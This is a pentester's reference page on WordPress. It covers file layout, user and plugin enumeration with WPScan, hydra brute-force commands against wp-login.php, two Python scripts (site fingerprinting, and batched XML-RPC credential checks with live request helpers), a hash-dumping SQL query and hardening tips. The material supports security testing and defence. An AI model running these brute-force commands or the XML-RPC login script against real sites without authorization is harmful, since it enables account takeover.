WordPress
WordPress is a system that was created to build and manage blogs. It's now widely used for any kind of website. There are tons of plugins making it fast and easy to create websites.
- Learning websites: search for "LMS" plugins
- Manga websites: search for "madara" or "MangaStream"
- ...
⚠️ Note that most themes/plugins are paid.
Useful links?
- wpgiz (blog)
- themeforest (themes) or jojo-themes (themes)
WordPress Overview
Common WordPress Endpoints
Files
Folders
- Themes are stored in /wp-content/themes/<theme_name>/.
- Plugin files are stored in /wp-content/plugins/<plugin_name>/. There is usually a readme.txt explaining how it works (its "Stable tag" line gives the plugin version). The site root also ships a readme.html that reveals the WordPress version.
- Uploaded files are stored in /wp-content/uploads/ (usually in year/month subfolders).
- Critical internal WordPress files are stored in /wp-includes/.
WordPress Pentester Notes ⚠️
WordPress Enumeration
You can enumerate metadata, themes, plugins, and usernames.
- You can use WPScan to enumerate most of it
$ wpscan --url URL
$ wpscan --url URL -e u # users
$ wpscan --url URL -e t # popular themes ('at' for all themes, 'vt' for vulnerable themes only)
$ wpscan --url URL -e ap # all plugins ('p' for popular plugins, 'vp' for vulnerable plugins only)
$ wpscan --url URL [...] --plugins-detection aggressive
- Manually explore /wp-content/**/** if directory listing is enabled
- The WordPress version is in the source code (<meta name="generator" content="WordPress X.Y.Z">) or can be inferred from the default theme
- Plugin and theme names/versions are exposed within the website source code: link/script tags load assets from /wp-content/plugins/<name>/... and /wp-content/themes/<name>/.... The URL may include the version (?ver=X.Y.Z), though some core and theme assets carry the WordPress version instead of the component's, so treat it as a hint.
- Look for links to user accounts, iterate /?author=<id> (a valid id redirects to /author/<username>/), or use /wp-json/wp/v2/users (before 4.7.1 this listed every user; newer versions still list users who have authored public posts). While crawling the website, you may also find URLs such as /author/<username>.
$ onectf crawl -u URL | grep author
- You can try to look in /robots.txt for something unexpected
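As an added example (not from the original notes), the following Python script does the manual source-code enumeration above on one page: it pulls the version from the generator meta tag, theme and plugin slugs with their ?ver= values from link/script URLs, and author slugs from /author/ links, and it parses a /wp-json/wp/v2/users response. The HTML and JSON inputs are constructed samples so it runs offline; fetch() is the only network call and is not used by default.

```python
"""Fingerprint a WordPress page from its HTML source (added example).

SAMPLE_HTML and SAMPLE_REST_USERS are constructed inputs, not captured from a
real site; replace them with the body of a GET on the target to use it live.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit
from urllib.request import Request, urlopen

SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel="stylesheet" href="https://example.test/wp-content/themes/twentytwentyfour/style.css?ver=1.0" />
<script src="https://example.test/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.4"></script>
<script src="/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.18.3"></script>
<link rel="https://api.w.org/" href="https://example.test/wp-json/" />
</head><body>
<a href="https://example.test/author/alice/">Posts by alice</a>
<a href="/author/alice/">alice again</a>
</body></html>"""

# Constructed sample of an unauthenticated GET /wp-json/wp/v2/users response.
# "slug" is the user_nicename, which defaults to the login name.
SAMPLE_REST_USERS = json.dumps([
    {"id": 1, "name": "Alice A.", "slug": "alice", "link": "https://example.test/author/alice/"},
    {"id": 3, "name": "Bob", "slug": "bob", "link": "https://example.test/author/bob/"},
])

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)', re.I)
# src/href pointing into /wp-content/plugins/<slug>/ or /wp-content/themes/<slug>/
ASSET_RE = re.compile(r'''(?:src|href)=["']([^"']*/wp-content/(plugins|themes)/([^/"']+)/[^"']*)["']''', re.I)
AUTHOR_RE = re.compile(r'''href=["'][^"']*/author/([^/"']+)/?["']''', re.I)


def fingerprint(html):
    """Return version, theme/plugin slugs with their ?ver= value, and author slugs."""
    found = {"version": None, "themes": {}, "plugins": {}, "authors": []}
    m = GENERATOR_RE.search(html)
    if m:
        found["version"] = m.group(1)
    for url, kind, slug in ASSET_RE.findall(html):
        # ?ver= is usually the component version, but core/theme assets sometimes
        # carry the WordPress version instead, so treat it as a hint, not proof.
        ver = parse_qs(urlsplit(url).query).get("ver", [None])[0]
        found[kind.lower()].setdefault(slug.lower(), ver)
    for name in AUTHOR_RE.findall(html):
        if name not in found["authors"]:
            found["authors"].append(name)
    return found


def rest_user_slugs(body):
    """Extract login candidates from a /wp-json/wp/v2/users JSON body."""
    return [u["slug"] for u in json.loads(body) if "slug" in u]


def author_slug_from_location(url):
    """/?author=<id> redirects a valid id to /author/<slug>/; pull the slug out of that URL."""
    m = re.search(r"/author/([^/?#]+)", url)
    return m.group(1) if m else None


def fetch(url):
    """Live helper (not used in the offline run): GET a URL, follow redirects,
    return (status, final_url, body). final_url is what /?author=N lands on."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urlopen(req, timeout=10) as resp:  # raises HTTPError on 4xx/5xx
        return resp.status, resp.url, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    print(json.dumps(fingerprint(SAMPLE_HTML), indent=2))
    print("REST users:", rest_user_slugs(SAMPLE_REST_USERS))
    print("author=1 ->", author_slug_from_location("https://example.test/author/alice/"))
```

Against a live site, call fetch(URL) and pass the body to fingerprint(), fetch(URL + "/wp-json/wp/v2/users") to rest_user_slugs(), and the final_url of fetch(URL + "/?author=1") to author_slug_from_location(); a 404 on the author probe means the id does not exist.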
WordPress Foothold
- The password may be weak and vulnerable to brute force:
$ wpscan --url URL -P wordlist -U username # or -U "username,username2" or -U users.txt
$ hydra -l username -P wordlist domain http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location' -V
$ hydra -l username -P wordlist domain http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=is incorrect' -V
The first hydra line treats a redirect (Location header) as success, the second treats the "is incorrect" error text as failure; use one or the other. Brute-forcing through xmlrpc.php (wp.getUsersBlogs, optionally batched with system.multicall) is faster than posting to wp-login.php, but XML-RPC is not always enabled. Check that /xmlrpc.php is present and answers before relying on it. WPScan checks this itself, but that check is skipped when you force --password-attack xmlrpc (or xmlrpc-multicall).
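The XML-RPC exchange behind that password attack, as an added example that is not from the original notes: the request bodies are encoded with Python's stdlib xmlrpc.client, so they are what xmlrpc.php expects, while the responses (listMethods, the "disabled" fault, a bad and a good wp.getUsersBlogs answer, and a system.multicall batch) are constructed samples modelled on WordPress's replies so the script runs offline. Only post() touches the network.

```python
"""XML-RPC credential check against WordPress (added example).

The SAMPLE_* bodies below are constructed, not captured; fault codes 403
(bad login) and 405 (XML-RPC disabled) mirror what WordPress sends.
"""
import xmlrpc.client as xc
from urllib.request import Request, urlopen

# system.listMethods on a site with XML-RPC enabled (list shortened).
SAMPLE_LIST_METHODS = xc.dumps((["system.listMethods", "system.multicall",
                                 "wp.getUsersBlogs", "wp.getPosts"],), methodresponse=True)
# Site where the xmlrpc_enabled filter returns false.
SAMPLE_DISABLED = xc.dumps(xc.Fault(405, "XML-RPC services are disabled on this site."),
                           methodresponse=True)
# wp.getUsersBlogs with wrong credentials.
SAMPLE_BAD_LOGIN = xc.dumps(xc.Fault(403, "Incorrect username or password."), methodresponse=True)
# wp.getUsersBlogs with valid credentials: one struct per blog.
BLOG = {"isAdmin": True, "url": "https://example.test/", "blogid": "1",
        "blogName": "Example", "xmlrpc": "https://example.test/xmlrpc.php"}
SAMPLE_GOOD_LOGIN = xc.dumps(([BLOG],), methodresponse=True)
# system.multicall wrapping two wp.getUsersBlogs calls: a fault struct for the
# failed one, and the result wrapped in a one-element array for the good one.
SAMPLE_MULTICALL = xc.dumps(([{"faultCode": 403, "faultString": "Incorrect username or password."},
                              [[BLOG]]],), methodresponse=True)


def build_login_probe(user, password):
    """Request body for a single wp.getUsersBlogs credential check."""
    return xc.dumps((user, password), methodname="wp.getUsersBlogs")


def build_multicall(creds):
    """Batch many checks into one HTTP request via system.multicall."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [u, p]} for u, p in creds]
    return xc.dumps((calls,), methodname="system.multicall")


def xmlrpc_enabled(list_methods_body):
    """True if the endpoint answered system.listMethods and exposes wp.getUsersBlogs."""
    try:
        (methods,), _ = xc.loads(list_methods_body)
    except xc.Fault:            # e.g. faultCode 405 when XML-RPC is disabled
        return False
    return "wp.getUsersBlogs" in methods


def parse_login_response(body):
    """True for valid credentials, False for a 403 fault; other faults propagate."""
    try:
        (blogs,), _ = xc.loads(body)
    except xc.Fault as fault:
        if fault.faultCode == 403:
            return False
        raise                   # disabled endpoint, rate limiting, etc.: not a wrong password
    return isinstance(blogs, list)


def parse_multicall_response(body, creds):
    """Return the (user, password) pairs that succeeded inside a multicall."""
    (results,), _ = xc.loads(body)
    valid = []
    for pair, item in zip(creds, results):
        if isinstance(item, dict):   # per-call fault struct
            continue
        valid.append(pair)
    return valid


def post(url, body):
    """Live helper: POST an XML-RPC body to xmlrpc.php and return the response text."""
    req = Request(url, data=body.encode(),
                  headers={"Content-Type": "text/xml", "User-Agent": "Mozilla/5.0"})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    creds = [("admin", "wrong"), ("admin", "right")]
    print("enabled:", xmlrpc_enabled(SAMPLE_LIST_METHODS), xmlrpc_enabled(SAMPLE_DISABLED))
    print("single:", parse_login_response(SAMPLE_BAD_LOGIN), parse_login_response(SAMPLE_GOOD_LOGIN))
    print("multicall:", parse_multicall_response(SAMPLE_MULTICALL, creds))
```

Live use is post(URL + "/xmlrpc.php", xc.dumps((), "system.listMethods")) fed to xmlrpc_enabled() first, then post() of build_multicall(creds) fed to parse_multicall_response(). Note that parse_login_response() deliberately re-raises anything that is not a 403 so a blocked or disabled endpoint is not misread as a run of bad passwords.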
WordPress Exploitation
Refer to:
To-do
Stuff that I found but haven't read/used yet.
WordPress Hardening
- Remove unused themes and plugins (deactivating a plugin doesn't remove its files, so they can still be reached and exploited)
- Hide usernames (author pages and the REST users endpoint leak them)
- Disable registration (Settings > General > "Anyone can register")
- Use security plugins (change the login page URL, ban IPs...)
- Admins (users with the unfiltered_html capability) can write HTML in comments and it will be rendered; comments from normal users are filtered
- Enable auto-updates (for themes and plugins too)
- Install only trusted themes/plugins
- sucuri-scanner, better-wp-security, wordfence
Configuration
- wp-config.php > can enable debug with "WP_DEBUG" (leave it false in production; it prints file paths and errors to visitors)
- set the main page > Settings > Reading > static page
- usually Apache (/var/www/html) and MySQL
Plugins
- Elementor
- JetPack
Stuff
- CMA, CDA (content management application / content delivery application)
- WYSIWYG
- /wp-admin/, login.php, wp-login.php
- xmlrpc.php (XML-RPC API)
- select user_login,user_pass from wp_users; (password hashes, phpass "$P$..." format; hashcat mode 400)
- user levels 0 to 10 (deprecated), 5 roles (Administrator, Editor, Author, Contributor, Subscriber), 6 with Super Admin on multisite